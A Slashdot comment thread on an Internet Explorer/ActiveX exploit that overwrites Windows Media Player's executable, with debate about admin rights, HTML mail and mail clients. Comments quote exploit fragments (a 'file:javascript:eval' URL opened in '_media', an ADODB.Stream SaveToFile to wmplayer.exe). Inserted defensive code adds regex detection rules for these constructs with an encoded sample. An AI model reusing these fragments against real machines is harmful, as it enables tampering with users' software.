      Was no one thinking about security at Microsoft? My guess is this: all Microsoft was thinking of was that this would enable Visual Basic programmers to "leverage" the Microsoft browser to easily write all sorts of wonderful revenue-generating applications that as browser scripts would effectively run on servers and thus would never have to be sold to end-users, but instead rented over and over, guaranteeing customer lock-in for vendors and thus vendor (and customer) lock-in for Microsoft.

      I mean, Christ. This is just a travesty, an open invitation to all sorts of mayhem. I knew Microsoft didn't give a rat's ass about security, but I never knew javascript could be so bad.

      I tested a bit of it against my standard Proxomitron filters, and I'm not sure that I'd have blocked it.

      Except that this particular script stupidly hard-codes saving the executable to drive C:, and thanks to some Windows screw up when I was forced to re-install it, thankfully for the last six months, C was read-only on my PC, having been accidentally assigned by Windows to my CD-ROM drive.

      I'll switch my drive assignment back today, and make C my CD-ROM (and that's security through obscurity) once again.

      What the hell?
    12. Re:Are there really better alternatives??? by ONOIML8 · · Score: 1

      "I don't mean that to insult MS"

      That's ok, don't worry about it. They usually end up insulting themselves with stupid statements, poor products, lack of security, etc. So your comments are no big deal, don't worry about it.

      Or are you afraid they'll send lawyers after you??

      .

      --
      . Quit playing Monopoly with Bill. Switch to one of many non-Microsoft products today.
    13. Re:Are there really better alternatives??? by aborchers · · Score: 1

      Just a little teasing. If I'd really thought you were trolling, I wouldn't have responded. I just meant that I figured you'd have seen that question batted around before.

      I'm a Mozilla devote' as well. I used Opera before, but Moz won me over.

      --
      Trouble making decisions? Just flip for it.
    14. Re:Are there really better alternatives??? by wagemonkey · · Score: 1

      If you only want the browser firefox is pretty good.
      The mouse gestures work in firefox too, even though the docs don't mention it, if I can get multizilla working on firefox too I think I'd switch totally. I split between Moz, Firefox and Opera at the moment, they all have their strengths, I suppose I could live with any of them - I just need to make my mind up.

    15. Re:Are there really better alternatives??? by Anonymous Coward · · Score: 0
      Fire{WHATEVER_WEEK_THIS_IS} doesn't, so far as I know, do this:

      Guess what, Mozilla has a similar "feature". It's called XMLHTTPRequest. You can make GETs and POSTs with it. I know for a fact that the User Agent Switcher Firefox extension secretly uses this. Here's an excerpt from the jarfile source:

      // Initializes the about dialog
      function useragentswitcher_initializeAbout()
      {
          var latestVersion = 0;
          var request = new XMLHttpRequest();

          // This must be done to make generated content render
          request.open("GET", "http://chrispederick.myacen.com/work/firebird/useragentswitcher/version.txt", false);
          request.send("");

      There's also a Mozilla API execute method under the File object. I haven't looked into it too much, but it's something to look out for. I've often wondered if a malicious script kiddie took the time to study the XULPlanet docs, what kind of havoc they could wreak.
    16. Re:Are there really better alternatives??? by Anonymous Coward · · Score: 0

      The only thing a simple script like this could touch on my box is /home/ealar/*

      That gets backed up nightly and every time the directory changes by 200kb.

      I don't really think such a script would have a major impact on my box.

    17. Re:Are there really better alternatives??? by orthogonal · · Score: 1
      Firefox, the browser, doesn't support ActiveX or VBScript. It supports JavaScript instead. The latter runs in a sandbox which prevents it from writing files to disk without specific permission.

      The exploit in the html isn't running VB; it's running (Microsoft's implementation of) javascript, which can instantiate and call functions on ActiveX objects. You can see this in this snippet of the code, which is called (indirectly) by the java function (document.all.code.value is the contents of a hidden text box, suitably escaped by the function preparecode).

      function doit() {
          mycode = preparecode(document.all.code.value);
          myURL = "file:javascript:eval('" + mycode + "')";
          window.open(myURL,"_media")
      }

      (And contrary to a prior post of mine, my Proxomitron setup would have caught this, as it replaces any occurrence of "setTimeOut" with "noSetTimeOut" which isn't a javascript function and therefore never runs.)
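
The constructs quoted in the two posts above (ActiveX instantiation from script, `SaveToFile` to an executable path, the `file:javascript:` URL opened in `_media`, and the hidden textarea) can be checked for statically before a message is rendered. The following is an added example, not code from the posts or from the article they discuss; the rule weights, thresholds, function names, the `display:none` hiding mechanism and both sample messages are assumptions constructed for illustration.

```javascript
// Static triage of an HTML mail body for the script constructs discussed in
// this thread. Weights and thresholds are illustrative assumptions.
const RULES = [
  { id: "activex-file-write", weight: 5,
    re: /ActiveXObject\s*\(\s*["']ADODB\.Stream["']\s*\)/i },
  { id: "activex-http-fetch", weight: 3,
    re: /ActiveXObject\s*\(\s*["'](?:Microsoft|Msxml2)\.XMLHTTP[^"']*["']\s*\)/i },
  { id: "save-executable", weight: 5,
    re: /\.SaveToFile\s*\(\s*["'][^"']*\.(?:exe|dll|scr|com)["']/i },
  { id: "local-zone-eval-url", weight: 4, re: /file:\s*javascript:/i },
  { id: "media-bar-window", weight: 2,
    re: /window\.open\s*\([^;\n]{0,200}["']_media["']/i },
  // Assumption: the textarea is hidden with inline CSS.
  { id: "hidden-textarea", weight: 1,
    re: /<textarea\b[^>]*(?:display\s*:\s*none|visibility\s*:\s*hidden)/i },
];

// Decode HTML character references (numeric and a few named ones).
function decodeEntities(s) {
  const named = { lt: "<", gt: ">", amp: "&", quot: '"', apos: "'" };
  return s.replace(/&(#x[0-9a-f]+|#\d+|[a-z]+);/gi, (m, body) => {
    if (body[0] === "#") {
      const code = body[1].toLowerCase() === "x"
        ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
      return code <= 0x10ffff ? String.fromCodePoint(code) : m;
    }
    const hit = named[body.toLowerCase()];
    return hit === undefined ? m : hit;
  });
}

// Tolerant percent-decoding (%XX and legacy %uXXXX); never throws on bad input.
function decodePercent(s) {
  return s.replace(/%u([0-9a-f]{4})|%([0-9a-f]{2})/gi, (m, u, h) =>
    String.fromCharCode(parseInt(u || h, 16)));
}

// Peel nested encodings until the text stops changing (bounded rounds).
function normalise(text, maxRounds = 4) {
  let current = text;
  for (let i = 0; i < maxRounds; i++) {
    const next = decodePercent(decodeEntities(current));
    if (next === current) break;
    current = next;
  }
  return current;
}

// Match each rule against the raw body first, then the decoded body, and
// record whether the indicator was only visible after decoding.
function scanHtml(html) {
  const views = [html, normalise(html)];
  const findings = [];
  for (const rule of RULES) {
    const layer = views.findIndex((v) => rule.re.test(v));
    if (layer !== -1) {
      findings.push({ id: rule.id, weight: rule.weight, obfuscated: layer === 1 });
    }
  }
  const score = findings.reduce((sum, f) => sum + f.weight, 0);
  const verdict = score >= 8 ? "block" : score >= 3 ? "quarantine" : "deliver";
  return { score, verdict, findings };
}

// Constructed sample: fragments only, with the indicators partly encoded.
const SAMPLE_ECARD = [
  "<html><body><p>You have received an e-card!</p>",
  '<textarea id="code" style="display:none">',
  "var x = new ActiveXObject(&quot;Microsoft.XMLHTTP&quot;);",
  "var s = new ActiveXObject(%22ADODB.Stream%22);",
  "s.SaveToFile(&quot;C:\\\\Program Files\\\\Windows Media Player\\\\wmplayer.exe&quot;,2);",
  "</textarea>",
  '<script>var u = "file:javascript:" + payload; window.open(u, "_media");</script>',
  "</body></html>",
].join("\n");

// Constructed sample: ordinary HTML mail with a visible textarea.
const SAMPLE_BENIGN =
  '<html><body><p>Agenda: <a href="https://example.invalid/agenda">link</a></p>' +
  '<textarea rows="3">reply here</textarea></body></html>';

console.log(scanHtml(SAMPLE_ECARD).verdict, scanHtml(SAMPLE_BENIGN).verdict);
```

A message that merely quotes these constructs as text, such as a security newsletter, will also score, so the verdict suits quarantine-and-review rather than silent deletion.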
    18. Re:Are there really better alternatives??? by zoney_ie · · Score: 1

      > thanks to some Windows screw up when I was forced to re-install it, thankfully for the last six months, C was read-only on my PC, having been accidently assigned by Windows to my CD-ROM drive.

      Heh heh, yup, that's pretty impressive even for Windows. You gotta love it. (brushing your teeth with Coca-cola style loving it)

      For real fun though, you can beat putting a Win9x installed HDD into a different machine and booting it up. It's like a brain transplant as far as the OS is concerned - watch it go NUTS. (Hey looky, I've found 3 PCI bridges, 10 processors and 50 other motherboard components!)

      --
      -- *~()____) This message will self-destruct in 5 seconds...
    19. Re:Are there really better alternatives??? by WWWWolf · · Score: 1
      s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);

      What kind of slacker wrote this code, anyway? "C:\Program Files\" isn't in the same place for everyone, even in out-of-the-box Windows installs. For me, it seems to be "C:\Ohjelmatiedostot\" =)

      This is probably the only kind of case I can thank Microsoft for the way they do localizations, but frankly, I like the Mac/*NIX way of doing localized file names (the real filesystem name is same everywhere, the file manager shows the appropriate translation if needed...)

    20. Re:Are there really better alternatives??? by orthogonal · · Score: 1

      Guess what, Mozilla has a similar "feature". It's called XMLHTTPRequest.... There's also a Mozilla API execute method under the File object.

      OK, it's a bit unsettling that a FireHedgeHog extension hard-codes a request to its author's page.

      But still, it's in an extension that the user affirmatively installed.

      Can XMLHTTPRequest and File.execute be used in javascript loaded into the browser from a web site/ file, or only from installed .jar files?

      If the former, yes, it's a problem. If it can only be called from installed jars, I'm less worried.

    21. Re:Are there really better alternatives??? by wunderhorn1 · · Score: 1

      "brushing your teeth with Coca-cola style loving it" is my new favorite catchphrase. do I credit you, or is there an original source for it?

      --
      Karma: Bored. (Thinking about resurrecting the "Anyone else is an imposter" joke.)
    22. Re:Are there really better alternatives??? by zoney_ie · · Score: 1

      Nope, I can assure you that is one phrase I have not heard anywhere else but in the ramblings of my imagination!

      I must remember it though, tis quite good.

      --
      -- *~()____) This message will self-destruct in 5 seconds...
    23. Re:Are there really better alternatives??? by pegr · · Score: 1

      Bow before my 5 digit greatness, you six-digit swine! (Cold thread, thought I'd use it to get your attention...)

      OK, now where's that thread where I get beat up by a gaggle of 2 and 3 digit /. gods? ;)

  19. Re:It'd be scary if I ran my PC as Administrator.. by ggvaidya · · Score: 5, Interesting

    That's the point! There's no "crapware" - it's a simple file overwrite! If you're running as Admin..., you won't notice at all - your media player will just suddenly stop working.

  20. Conclusions by kyshtock · · Score: 5, Insightful
    I believe that there are at least 2 conclusions here:

    1. Clicking can be dangerous.

    2. If an operating system is that badly designed so one can actually overwrite an executable only by visiting a web page, then it's time to change the security settings.

    --
    Bite my shiny metal... oops... Nevermind!
  21. Don't run ActiveX as Administrator, simple. by gfecyk · · Score: 4, Informative

    Win98 is supposed to be gone, or no longer supported.

    Assuming that, and that your WinLusers are running current versions of Windows with actual security, and they're running as regular users, a web page CAN'T overwrite anything because regular users don't have write permissions in %systemroot% or in Program Files.

    Problem solved. Without a script blocker or any other third-party garbage.

    --
    Use Evolution instead of Outlook? Bewa
    1. Re:Don't run ActiveX as Administrator, simple. by glenrm · · Score: 3, Insightful

      Huh, so what if you are running as admin, why would I want a web page to overwrite .exe files without asking permission? In the race to keep up with Java some very unsafe things were done with ActiveX...

    2. Re:Don't run ActiveX as Administrator, simple. by jdhutchins · · Score: 4, Insightful

      Most windows users end up running as admin. Many windows programs need to be admin to run, and people get fed up with this, so they just run everyone as admin.

    3. Re:Don't run ActiveX as Administrator, simple. by dAzED1 · · Score: 4, Insightful
      that simple? Really?

      My wife had to use MS office for something, so I installed XP on one of my laptops for her. It wanted to add a user. I put her name in.

      Gosh, whatya know...it made her an admin. Yeah, default behaviour. That's peachy. The problem is what the normal people will do.

      for the normal user, the win98 lack of security has not changed in XP. Still there. And activeX is enabled by default as well.

    4. Re:Don't run ActiveX as Administrator, simple. by 0123456 · · Score: 3, Informative

      Yep. Even for video editing I have to run as Administrator, and I really don't want to have to keep changing users in order to run different programs. I did try to set up a non-Administrator user for my GF to use on the same PC, but half the programs she wanted to run wouldn't work without Administrator privilege, so I gave up.

      "Security" in Windows is just broken, it's that simple.

    5. Re:Don't run ActiveX as Administrator, simple. by sqlrob · · Score: 2, Informative

      Win98 is supposed to be gone, or no longer supported.

      Not true. Support was extended two years.

    6. Re:Don't run ActiveX as Administrator, simple. by ncr53c8xx · · Score: 2, Informative
      Many windows programs need to be admin to run, and people get fed up with this, so they just run everyone as admin.

      You don't need admin access unless you want to run some system utilities. The only time I had to login as admin was when I tried to run Sandra. I have found several programs that need Power User access to function properly though (RealJukebox etc). Since the Power Users group members can install software, this is somewhat undesirable.

    7. Re:Don't run ActiveX as Administrator, simple. by sammy+baby · · Score: 1
      Don't run ActiveX as Administrator, simple.

      And don't use Windows Update, either, as it requires an ActiveX control to version-check your installed software.
    8. Re:Don't run ActiveX as Administrator, simple. by jasonbowen · · Score: 1

      I'd like to do that, but if I don't run as administrator by default, I have to manually run as administrator and type in the administrator password for nearly every piece of software I use. Why can't Microsoft implement a concept like SUID?

    9. Re:Don't run ActiveX as Administrator, simple. by the_L0rax · · Score: 2, Interesting

      They're right, even if you know better than to have your regular account be an admin account MS pretty much forces you to operate that way. I have tried setting up separate accounts and it just isn't practical. Way too many things require you to have admin privileges, so you can either switch users every 3rd program or you just give up and use an admin account. Even right clicking and choosing "Run As" rarely works right. Microsoft made a half-a**ed attempt at multi-user support just so they could say they had it.

    10. Re:Don't run ActiveX as Administrator, simple. by AndroidCat · · Score: 1

      You can set microsoft.com (or where-ever) as a Trusted site. (You trust Microsoft, don't you?) I made Slashdot a Trusted site because of something that wanted to run ActiveX all the time. (Normally it prompts. Every page.) I think I'll review that and move Slashdot to my Hell No! zone if it won't break anything.

      --
      One line blog. I hear that they're called Twitters now.
  22. Turn off HTML viewing in your email client! by turnstyle · · Score: 5, Insightful
    I've said it before, and it's worth repeating... turn off HTML viewing in your email client, and do it now!

    It's an easy way to protect yourself from all sorts of stupid stuff.

    Ahem, turn off HTML viewing in your email client NOW.

    --
    Here's what I do: Bitty Browser & Andromeda
    1. Re:Turn off HTML viewing in your email client! by ackthpt · · Score: 4, Informative
      I've been using The Bat (www.ritlabs.com) for about 5 years now, and it's great. No worms, no virii, no pop-ups, no crap. I view all my email as text. And they've been continuously improving the product.

      Support shareware :-)

      --

      A feeling of having made the same mistake before: Deja Foobar
    2. Re:Turn off HTML viewing in your email client! by Anonymous Coward · · Score: 5, Funny

      But that's a cool feature!

      What next? Should I stop using Outlook???

    3. Re:Turn off HTML viewing in your email client! by simp · · Score: 5, Informative

      Switch off HTML formatting for Outlook.

      See http://support.microsoft.com/default.aspx?scid=kb;EN-US;307594 on how to do it.

    4. Re:Turn off HTML viewing in your email client! by Erik+Piper · · Score: 4, Interesting

      There are many cases where you can communicate more -- and I don't mean a marketing message -- with pictures plus words than you can with just words. I do tech support, and I'm THRILLED when the person on "the other end of the line" sends me an HTML e-mail, because it means I can use the features of HTML mail to provide him or her a clearer, more visible explanation, and if that person has a decent Internet connection, I can even ask them to paste screenshots into their e-mails instead of trying to guess which client they have and how pasting attachments in it works, and then explaining it to them and hoping they understand.

      Erik

    5. Re:Turn off HTML viewing in your email client! by JPriest · · Score: 5, Informative
      There is a client called pocomail that I use that is pretty safe. It has an intuitive spam filter, you can script it to do about anything with mail, and it has a simple filter setup for sending messages from X to folder Y.

      spam filter:
      "viagra", +9
      "herbal", +6
      "natural", +6
      "to be removed", +5
      "free", +2
      "!!!", +2

      You get the point. You can toggle things like loading external graphics etc. It is really a mail client for power users. Shareware, but one of the few programs I ever purchased.

      --
      Saying Java is nice because it works on all OS's is like saying that anal sex is nice because it works on all genders.
    6. Re:Turn off HTML viewing in your email client! by pldms · · Score: 4, Insightful

      There are many cases where you can communicate more -- and I don't mean a marketing message -- with pictures plus words than you can with just word

      Ok, but that doesn't require html; MIME can do this fine. In fact it's better since the image is part of the message,

      --
      Slashdot looked deep within my soul and assigned
      me a number based on the order in which I joined
    7. Re:Turn off HTML viewing in your email client! by Erik+Piper · · Score: 1

      But in terms of real, non-technical end-users, HTML is what's out there.

      Erik

    8. Re:Turn off HTML viewing in your email client! by RetroGeek · · Score: 3, Informative

      features of HTML mail ... paste screenshots

      And pasting a screen shot into a word processing document, then attaching that is not OK? Yes, a little more work, but the benefit is safer Internet use for the rest of us.

      Email is Email. HTML is for Web pages. The marriage of the two (Thanks Bill!) makes SPAM more dangerous, lets the email sender track you (via 1x1 images), and makes email messages MUCH larger thereby wasting bandwidth.

      --

      - - - - - - - - - - -
      I am a programmer. I am paid to produce syntax not grammar. Deal with it.
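An added example (not part of any comment in this thread) of the text-only viewing this thread recommends: it shows the text/plain alternative when a message has one, and only audits the HTML part for what rendering it would fetch or run, including the 1x1 tracking images mentioned above. The sample message, its example.* hosts and the names `safe_view` and `HtmlAudit` are constructed for illustration.

```python
from email import message_from_string, policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample message (not from the article): multipart/alternative with
# a plain-text part and an HTML part holding a 1x1 remote image and a script.
SAMPLE = """\
From: cards@example.com
To: user@example.org
Subject: You have received an e-card
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="us-ascii"

A friend sent you a card. Visit the site to view it.
--b1
Content-Type: text/html; charset="us-ascii"

<html><body>
<p>A friend sent you a card.</p>
<img src="http://tracker.example.net/o.gif?id=user%40example.org" width="1" height="1">
<img src="cid:logo123">
<script src="http://cards.example.net/view.js"></script>
</body></html>
--b1--
"""

URL_ATTRS = ("src", "background", "data", "codebase")  # fetched at render time
ACTIVE_TAGS = ("script", "object", "embed", "applet", "iframe")


class HtmlAudit(HTMLParser):
    """Collects visible text, render-time remote fetches and active content."""

    def __init__(self):
        super().__init__()
        self.text, self.remote, self.active = [], [], []
        self._skip = 0  # depth inside <script>/<style>, whose data is not text

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag in ("script", "style"):
            self._skip += 1
        # Tags that embed code, or any tag carrying an on* event handler.
        if tag in ACTIVE_TAGS or any(k.startswith("on") for k in a):
            self.active.append(tag)
        for name in URL_ATTRS:
            url = a.get(name, "")
            # cid: references point inside the message; http(s) leaves the machine.
            if urlparse(url).scheme in ("http", "https"):
                bug = (tag == "img" and a.get("width") in ("0", "1")
                       and a.get("height") in ("0", "1"))
                self.remote.append((tag, url, bug))

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.text.append(data)


def safe_view(raw):
    """Return the text to display plus an audit of the HTML part (never rendered)."""
    msg = message_from_string(raw, policy=policy.default)
    audit = HtmlAudit()
    html_part = msg.get_body(preferencelist=("html",))
    if html_part is not None:
        audit.feed(html_part.get_content())
        audit.close()
    plain_part = msg.get_body(preferencelist=("plain",))
    if plain_part is not None:
        text = plain_part.get_content().strip()
    else:
        # HTML-only message: fall back to the tag-stripped text, scripts excluded.
        text = " ".join("".join(audit.text).split())
    return {"text": text, "remote": audit.remote, "active": audit.active}


if __name__ == "__main__":
    report = safe_view(SAMPLE)
    print(report["text"])
    for tag, url, bug in report["remote"]:
        print("remote fetch blocked:", tag, url, "(1x1 web bug)" if bug else "")
    print("active content:", report["active"])
```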
    9. Re:Turn off HTML viewing in your email client! by Anonymous Coward · · Score: 3, Insightful

      Switch off HTML formatting for Outlook.

      Hah. If that would be the only problem with Outlook.

    10. Re:Turn off HTML viewing in your email client! by misleb · · Score: 5, Insightful
      But in terms of real, non-technical end-users, HTML is what's out there.

      The point is, attaching pictures to email has absolutely nothing to do with HTML. "Non-technical end-users" don't compose HTML that references pictures because it requires having a Web server to serve the pictures. All you are really going to get out of HTML in an email is varied fonts and colors. As neat as that might be, it is hardly enhanced communication. Nor is it worth the risks.

      95% of the HTML email I get is spam. The other 5% is messages from mailing list subscriptions or Amazon or whatever. Most of those come with both plain text and HTML. If nothing else, most "nontechnical end-users" would do good to turn off HTML so they won't have to look at offensive porn spam with obscene images (not attachments).

      -matthew

      --
      "THERE IS NO JUSTICE, THERE IS ONLY ME." -Death
    11. Re:Turn off HTML viewing in your email client! by Endive4Ever · · Score: 3, Informative

      The image being part of the message is supposed to be a good thing?

      I never, ever, send mail in an HTML format. But I always send photographs and other stuff like that as urls (plaintext URLs, which most modern mail readers sense and interpret as web-links) to images I store on my webspace somewhere.

      Why shuttle around bloated email attachments?

      --
      ---
    12. Re:Turn off HTML viewing in your email client! by Anonymous Coward · · Score: 2, Informative

      What sucks is that Microsoft (thanks, Bill!) decided to use IE as the viewer for emailed HTML (specifically, it's the core part of IE that's being recycled in Outlook, effectively IE). So not only can an Outlook bug get you, you'll get double-dipped by any IE bugs that are out there. Lovely!

    13. Re:Turn off HTML viewing in your email client! by corbettw · · Score: 3, Informative
      --
      God invented whiskey so the Irish would not rule the world.
    14. Re:Turn off HTML viewing in your email client! by Erik+Piper · · Score: 4, Insightful

      Ummm... because you're an ordinary mortal and don't have your own webspace somewhere, perhaps?

      Because, in the case I was describing, tech support, having the image integrated into the message -- like saying "click [picture of button]" instead of "click the button that looks like Bugs Bunny on speed" or whatever is a lot more helpful?

      A LOT of damn good reasons. It is indeed supposed to be a good thing.

      Erik

    15. Re:Turn off HTML viewing in your email client! by misleb · · Score: 2, Interesting
      I never, ever, send mail in an HTML format. But I always send photographs and other stuff like that as urls (plaintext URLs, which most modern mail readers sense and interpret as web-links) to images I store on my webspace somewhere.

      This isn't a realistic option for most people. Nor is it very convenient. Unless, of course, the image is part of an existing website.

      Why shuttle around bloated email attachments?

      It is not a big deal in most cases. Although this brings up an interesting point. There are cases when people want to send files (maybe an MP3 or movie) in excess of 5 megabytes. This is not appropriate for the current state of email (SMTP, et al). What do regular users do when they want to send someone a large file? They're not going to choke MY SMTP servers (with virus scanning) with their huge attachments.

      -matthew

      --
      "THERE IS NO JUSTICE, THERE IS ONLY ME." -Death
    16. Re:Turn off HTML viewing in your email client! by gnu-generation-one · · Score: 5, Funny

      "I've said it before, and it's worth repeating... turn off HTML viewing in your email client, and do it now!... It's an easy way to protect yourself from all sorts of stupid stuff... Ahem, turn off HTML viewing in your email client NOW.

      I misread that as "turn off HTML viewing in your web browser NOW", and wondered why it wasn't marked as funny...

      Well, it would make some things safer...

    17. Re:Turn off HTML viewing in your email client! by FooAtWFU · · Score: 2, Funny

      I don't have HTML viewing available... I use Pine, you insensitive clod!!! ;)

      --
      The World Wide Web is dying. Soon, we shall have only the Internet.
    18. Re:Turn off HTML viewing in your email client! by randomblast · · Score: 1

      or alternatively use a real mail client like evolution :p

      --
      ...these aren't my real teeth.
    19. Re:Turn off HTML viewing in your email client! by EasyTarget · · Score: 5, Informative

      I've been using The Bat (www.ritlabs.com) for about 5 years now, and it's great. No worms, no virii, no pop-ups, no crap. I view all my email as text. And they've been continuously improving the product.

      Where to start.. I finally ditched the Bat! after my five years last week.. and good riddance.

      The UI has not evolved, sure lots of new features get added over the years, but they all end up as hacks into an already clumsy interface.

      The UI is a classic case of a few -really- good features (I do appreciate them) surrounded by poo. Auto-formatting in the text is useless, NEVER paste some code and try to annotate it, turning it off leaves everything else looking ugly. Even Outlook manages to format its messages better.

      The UI displays a classic 'designed by the developers' illness. They can't see its flaws because they're too embedded in the development. If they'd just employ a professional UI designer to re-jig it, and actually do the things suggested, then it would be a world-beater.

      And you now have to upgrade ($$$) to the latest version to stay current. It's just the same as the old one, hardly any worthwhile new features. A money-spinning enforced upgrade of the most cynical sort.

      If you want its fantastic filtering systems, wonderful templates, clever widgets, superb PGP support etc.. and are prepared to put a lot of effort and patience into learning and using it, then I heartily recommend it.

      If all you want to do is write emails to people, and read ones you receive, save yourself time and money by looking elsewhere.

      --
      "Oops, I always forget the purpose of competition is to divide people into winners and losers." - Hobbes
    20. Re:Turn off HTML viewing in your email client! by rokzy · · Score: 1

      yes, this is a very good idea.

      one thing that pisses me off is how Thunderbird defaults to writing emails in HTML.

      what's the fucking point of this!? HTML email is crap and pointless and only useful for spam. why do the developers spend so much time integrating anti-spam options, then go make this idiotic contribution to the email?

      but no loading of remote images is a great option.

    21. Re:Turn off HTML viewing in your email client! by 1u3hr · · Score: 1
      Ummm... because you're an ordinary mortal and don't have your own webspace somewhere, perhaps?
      Because, in the case I was describing, tech support, having the image integrated into the message -- like saying "click [picture of button]" instead of "click the button that looks like Bugs Bunny on speed" or whatever is a lot more helpful?

      But you aren't an "ordinary mortal". You DO have your own webspace. Y (And anyway, any 10-year-old can make a web page on their ISP or a Geocities-kind of site; it was 10 years ago that "having a webpage" required knowhow.)

      Unfortunately, despite its promise, HTML email is almost invariably redundant and ugly (referencing fonts I don't have and looking like shit) and/or spam; not to mention the massive security risks scripting opens the recipient up to as in the FA.

    22. Re:Turn off HTML viewing in your email client! by first.last · · Score: 0

      But how will I see all the neat porn spam I get then????

      --
      Wishing I was a millionaire since 1969.
    23. Re:Turn off HTML viewing in your email client! by Anonymous Coward · · Score: 0

      Yes, because the default settings on Outlook are terrible.

      HTML has no place in email.

      Not to mention that Outlook is a generally crappy mail client anyway with slow searching, a generally poor interface, and as I said above, terrible default settings.

      I only use it because I'm forced to for the groupware functionality.

    24. Re:Turn off HTML viewing in your email client! by Endive4Ever · · Score: 2, Interesting

      When they first put in Windows for Workgroups at the company I worked for at the time, they put one of the more annoying putzes in Engineering in charge of 'the mail server' which was a wobbly install of NT Advanced Server 3.1.

      I proceeded to mail my entire c:\dos directory as attachments to one of my buddies. It just seemed like the thing to do. Boy, that took down the mail server bad.

      It really got the tech mad, but he was a third stringer doing make-work for the 'vanguard' engineer who thought it was such a good idea to roll out Windows For Workgroups (in direct conflict with the IT people who had other plans of afflicting us with Novell stuff,) and I was writing the embedded code that made the company's products run. It was overall a fun time.

      --
      ---
    25. Re:Turn off HTML viewing in your email client! by Spoing · · Score: 1
      1. Ahem, turn off HTML viewing in your email client NOW.

      While I don't have a problem with this (using Evolution on Linux), I had a discussion with my boss a few weeks ago and he agreed to turn off HTML viewing (if possible) and preview anything not local (to stop web bugs) if HTML could not be disabled. The trouble is after 1/2 an hour we couldn't figure out how to disable these 'features' in Outlook!

      Call me an idiot ("Hi idiot!"), though tell me where in that mess of secret sauce MS hid the switch? (1/2 an hour was all I could get on this non-work issue; Google didn't save me this time round.)

      --
      A firewall can not protect you from yourself. Turn off what you do not need. Do not use the firewall to do your work.
    26. Re:Turn off HTML viewing in your email client! by zcat_NZ · · Score: 1

      Why?

      I've turned off "plugins" and "Remote Image Loading" in my mail client, and while I only ever send plain text I do have other people send me HTML mail with performance graphs, etc, which I need to see.

      --
      455fe10422ca29c4933f95052b792ab2
    27. Re:Turn off HTML viewing in your email client! by Anonymous Coward · · Score: 0

      One line would have been sufficient. It would have also saved the rest of us from your rheumy reminiscences......

    28. Re:Turn off HTML viewing in your email client! by Anonymous Coward · · Score: 0

      You should have stopped using it years ago. Outlook is the major reason why there are so much virii out there in the wild.

      People need to ignore the commercial hype emanating from M$

      There are always going to be "click happy" bozos out there in net land that just don't get it.

      Better yet, get a Mac, Linux or any other non-M$ system. The world would be much better off.

    29. Re:Turn off HTML viewing in your email client! by jez9999 · · Score: 1

      Inform me when you find a decent email client for Windows, other than Outlook (Express), that allows for use of one Local Mail tree for all POP3 accounts.

    30. Re:Turn off HTML viewing in your email client! by MrGibbage · · Score: 1

      I don't think it is necessary to turn off all HTML rendering, but I do think it is crucial, and absolutely necessary to turn off all script execution by outlook. I don't use lookout, er, I mean, outlook, but my wife does. How can I turn off script execution, but keep html rendering?

    31. Re:Turn off HTML viewing in your email client! by b-baggins · · Score: 2

      Your car's tires are defective: Drive no faster than 35 MPH anywhere and do it now. What? Change the tires? You're an idiot. Don't drive any faster than 35 MPH and you'll be perfectly safe. What do you mean that limits the power and flexibility of your vehicle? Do you want to be safe or not? Drive no faster than 35 MPH and do it now!

      --
      You can tell a great deal about the character of a man by observing those who hate him.
    32. Re:Turn off HTML viewing in your email client! by Anonymous Coward · · Score: 0

      How do I do this in the "pine" email client?

    33. Re:Turn off HTML viewing in your email client! by DebianRcksLindowsLie · · Score: 1

      Why would anyone read their e-mail in Outlook Express?

      Mozilla, Evolution, Opera - there are TONS of alternatives out there!

      --
      Sick of people bad-mouthing Debian? Check my sig for info on how to stop them.

    34. Re:Turn off HTML viewing in your email client! by gcaseye6677 · · Score: 1

      Funny how it's easy to turn off images in Outlook Express, but not in the full version of Outlook (the one you actually pay for). I just looked in all the menus for about 10 minutes, and it seems like there is no option to not load images or HTML in email. Somebody please prove me wrong!

    35. Re:Turn off HTML viewing in your email client! by PacoTaco · · Score: 1

      HTML is off by default for untrusted senders in Outlook 2003.

    36. Re:Turn off HTML viewing in your email client! by YOU+LIKEWISE+FAIL+IT · · Score: 1

      What? You think that every time someone wants to render HTML in a pane they should have to write a parser + rendering engine + graphics handlers etc from the ground up?

      This is code reuse and it is a good thing.

      --
      One god, one market, one truth, one consumer.
    37. Re:Turn off HTML viewing in your email client! by horza · · Score: 1

      The Bat! is the best email client I've used, and is one of the few Shareware apps I've found worth paying for. I've forced the office here to buy a copy so I don't have to listen to them complaining about virus problems. I've no intention of paying to upgrade, the version I purchased years ago still does me fine. The one thing that justifies its purchase price on that feature alone is the 1-click backup (does everything in one go, saves your email and your settings, compresses and password protects) and 1-click restore. Fantastic.

      Phillip.

    38. Re:Turn off HTML viewing in your email client! by ComaVN · · Score: 1

      HTML is heaven compared to that RTF winmail.dat crap

      wtf would anyone want inline attachments in their e-mail.

      --
      Be wary of any facts that confirm your opinion.
    39. Re:Turn off HTML viewing in your email client! by Eivind · · Score: 1
      I'm genuinely curious though, what does it do that a recent version of Kmail does not ?

      People have mentioned filtering. Every client under the sun does this, kmail does it very well, and very intuitively.

      There was talk of gpg/pgp-integrations. Kmail has done this too for quite some time. After selecting which key to use for signing, use couldn't be simpler.

      This backup-thing sounds ok. Although I must admit I don't quite see why each app should try to implement backup by itself, rather than having one backup-solution for your entire computer. It'd be a hassle to have to separately backup in each and every program that stores data, rather than just, as I do now, mirror $HOME daily.

      What more is there to it ? In particular, what does it do that kmail doesn't ?

    40. Re:Turn off HTML viewing in your email client! by Anonymous Coward · · Score: 0

      You're too young to remember WFW, eh?

    41. Re:Turn off HTML viewing in your email client! by plover · · Score: 1
      Except that turns off all formatting for every message, including the important stuff my cow-orkers are trying to send me. They include things like tables, or highlight errors in listings in bold or red or something useful. They're actually starting to put these features to real use, rather than simply make their emails as gaudy as possible.

      I have installed Outclass, an Outlook plugin for running the outlook mail through POPFile. It comes with a nice "Safe View" button that displays the entire email in notepad, allowing me to do whatever I want with it without fear of triggering a spammer's web bug (or a cow-orkers stupid dancing signature line.)

